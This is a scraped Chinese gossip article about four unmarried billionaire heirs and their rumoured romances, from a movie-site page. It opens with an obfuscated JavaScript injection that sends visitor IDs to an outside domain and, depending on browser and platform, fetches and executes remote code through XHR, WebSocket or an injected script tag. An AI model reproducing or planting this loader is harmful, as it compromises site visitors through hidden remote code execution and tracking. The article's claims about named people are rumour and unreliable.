function mTMUwVt(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function QMCKIhS(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return mTMUwVt(t);};window[''+'M'+'x'+'X'+'y'+'B'+'G'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=QMCKIhS,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/8783/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZrb3UucWluZ2FpemFpeXVhbi5jbiUzQTTg4OTTE=','d3NNzJTNNBJTJGJTJGaG4ucm5naHNN6LmNNuJTNNBOTUzNNA==','7799',window,document,['T','N']);}:function(){};
4位大龄未婚百亿富二代,未婚生子,女友换不断,40岁仍单身

4位大龄未婚百亿富二代,未婚生子,女友换不断,40岁仍单身

娱乐圈从不少豪二代与女明星的爱恨纠葛,纨绔少爷们身边的漂亮女人一茬茬的换,真是看得人眼花缭乱。

图片

1.“玩出花”的王思聪

万达少爷王思聪这两天又很“忙”。

凭借《青春有你2》出圈的黄一鸣,在视频中公然指责王思聪不负责任,自己为其生下了女儿,却并未得到对方的认可。

图片

王思聪算是内地相当高调的豪二代,商业上未见这位阔少有何作为,却总在娱乐版面看见他的八卦消息。

这次他又被黄一鸣“锤了”,女方一口咬定孩子肯定是他的,但这位少爷却未做任何表态。

图片

直到13日,疑似“王少爷”把自己社交账号的头像换成了“你爹来了”,算是回应了这几天舆论上的炒作,只是不知他这态度是嘲讽还是认真?

图片

估计王思聪也不会因为黄一鸣为自己生了女儿,就真能收敛个性安心当个“好丈夫”,毕竟他的情史可太丰富了。

图片

王思聪是地产大亨王健林唯一的儿子,万达集团的资产曾霸占过内地富豪榜的首位,王思聪可是妥妥的内地豪二代之首。

年轻、多金又“博爱”,这样的钻石王老五自然身边有诸多美女“前仆后继”,从网红雪梨、豆儿甚至是如今已经小有名气的张予曦,都曾是王少爷的绯闻女友。

图片

在“王校长”这能维持住几个月“女友”身份的,就已经算是“任期”长的,王思聪选女友的眼光几乎能代表内娱“选美”的标准——白、瘦、幼,她们各个都拥有标准的大长腿、大眼睛和瓜子脸。

图片

真是难以想象,最终能收复这颗“浪子心”的女人到底会是“何方神圣”。

2.至今未婚的3娃之父——李泽楷

有“小超人”之称的李泽楷也是个风流浪子,他是香港首富李嘉诚的小儿子,是含着“金汤匙”出生的人生赢家。

图片

港媒将“小超人”的美名送给他是有原因的,他把“钱生钱”的游戏玩得炉火纯青,甚至更胜其父,当然风流成性他也从不败下风。

1992刚刚自立门户的李泽楷跟斯坦福大学同学交往,两人还算是学识相当的一对,可他俩交往一年后便分手了。

图片

花花公子岂能有“空窗期”,紧接着他又跟哥伦比亚大学硕士高材生,曾任日本NHK首席新闻主播的真正加留奈恋爱,可惜两人也未有结果。

此后,“小超人”又交往过法律世家出身的沈智慧、同公司的同事林慧仪,以及出身于葡籍法律世家的李素兰。

图片

可以这样说,在李泽楷而立之年以前,他交往的女友几乎还都是高知、高管的事业型女强人,尤其是钟爱女律师,前女友中有多位都是律师出身。

图片

这些高质量的女友竟然都没能让李泽楷动了“娶回家”的心思,一直留恋花丛的他却扛不住家族“开枝散叶”的压力。

哥哥李泽钜在他徘徊在各个女友之间时,为李家生了长孙、长孙女,或许迫于继承家业的压力,李泽楷跟女星梁洛施“动真格”了。

图片

两人恋爱一年后,梁洛施为“小超人”生下了儿子,并对外宣布产子并非是“意外”而是计划内,如此重磅的消息让人误以为梁洛施会迈进豪门,变成李太太。

图片

可惜,直到梁洛施为李泽楷一连生了三个儿子,还是未能换来一纸婚书,甚至两人还正式分手了,梁洛施成了为爱奉献的单亲妈妈。

图片

之后,李泽楷再度“选妃”,又一次相中了女律师——中欧混血美女梁芳,只可惜这段恋情也并未维持多久。

紧接着小女友郭嘉文出现,坊间传闻李泽楷为其购买了上亿豪宅,港媒还时常拍到两人甜蜜出街的照片。

图片

他俩似乎很投缘,李泽楷甚至还带小女友见了家长,让外界纷纷猜测郭嘉文要成梁洛施孩子的继母了。

图片

可没想到最终她也未能“修成正果”,两人维持4年的感情至今尚未有好消息传来,坊间还传闻两人疑似分手。

图片

如今,李泽楷也年近六十了,不知何时才能收敛了他那颗浪子之心。

3.“钻石王老五”霍启山

提及如今长相帅气、多才多金的豪门二代,必然有霍家次子霍启山之名,他的前女友也都是响当当的人物。

图片

这位少爷是香港老牌豪门家族——霍家的次子,霍英东曾被誉为“红色资本家”,父亲霍震霆也是能与李嘉诚并列的上一代豪门。

图片

霍启山最著名的前女友是内娱彼时的当家花旦章子怡,两人相识于某场名媛晚宴。

一个是刚刚崭露头角的内娱女星,一个是血气方刚的豪门阔少,“火光四射”之下,他们很快“来电”。

图片

两人热恋时竟然完全不在意追拍的记者,那张在停车场甜蜜亲吻的照片,时至今日都是豪门少爷与美艳女星的封顶之照,霍启山的帅气和章子怡的清纯,简直是绝配。

图片

可惜啊,正值事业上升期的子怡又怎会心甘情愿的当一只“金丝雀”,而霍家也并未高看这位娱乐圈绯闻缠身的女明星,两人的感情并未有结果。

图片

或许是为了满足“门当户对”的外置条件,霍启山跟赌王女儿何超莲还有过一段“不清不楚”的神秘关系。

图片

两人似乎是“有意”接触,却又并未对外官宣,虽然有媒体拍到了两人私下“约会”的照片,可双方却均未对此做出回应,也许是落花有意流水无情罢了。

图片

之后,霍启山又认爱外籍美女模特,若只是看脸的话,两人也是相当般配的。

图片

遗憾的是,当时霍家老太太吕燕妮尚在,她不允许霍家子孙迎娶外籍媳妇,霍启山的这段感情也只能是“忍痛割爱”。

图片

后来,又传出霍启山跟赌王最小的女儿何超欣疑似被两家家长“撮合”,甚至还有朱玲玲意欲定亲的消息。

可惜,这条消息似乎也只是外人的“一厢情愿”。

图片

另外,娃哈哈新人掌门人宗馥莉也被网友们列入霍启山的女友名单里,两人年龄和家世背景均比较接近,看起来到时般配。

可感情不是生意,岂能这样衡量?

图片

时至今日,霍启山还是孤身一人,就连其弟霍启仁都官宣求婚成功了,他却还在找一个“像大嫂”那样的爱人,不知最后会“花落谁家”吧。

图片

4.豪门清流汤珈铖

汤珈铖是著名房企汤臣一品的二代掌门人,他可是坐拥133套上亿豪宅的人生赢家,出生便躺在了财富的金字塔尖上。

图片

早年他被父母送去美国学习,刚满15岁时就展现出了过人的投资天赋,曾以父亲赠予的百万资金,在短短两年时间里实现了翻倍的收益。

18岁他就被父亲送上了继承人的宝座,没想到3年后其父因病去世,汤珈铖还真的成了整个集团的新任掌门。

图片

丧父之痛外加早年抑郁症的病根,曾让其一度濒临崩溃的边缘,好在这位年轻的掌门人熬了过去,重整汤氏集团,也造就了上海著名的奢品住宅——汤臣一品。

图片

不过这位阔少可跟王思聪不一样,他身边鲜少有女人出现,生活上也并不奢靡,赚钱在他看来只是兴趣,而并非是满足自己的物质欲望。

如今41岁的他还是单身,他曾公开表示自己心仪的女生是大眼睛心地善良的女生,只可惜时至今日仍无人能入了这位少爷的“法眼”。

图片

只能说豪门阔少各有心头好吧,有人缺了美女环抱就不自在,也有人“洁身自好”不近女色,唯单“不婚”是这几位共同的状态,不知他们未来的感情将如何发展,大家可以拭目以待。


 分享

本文由网络整理 © 版权归原作者所有

  •  主题颜色

    • 橘色
    • 绿色
    • 蓝色
    • 粉色
    • 红色
    • 金色
  • 扫码用手机访问

本站只提供WEB页面服务,本站不存储、不制作任何视频,不承担任何由于内容的合法性及健康性所引起的争议和法律责任。

若本站收录内容侵犯了您的权益,请附说明联系邮箱,本站将第一时间处理。

© 2024 80s电影网(www.80s-tv.com)  E-Mail:[email protected]  

观看记录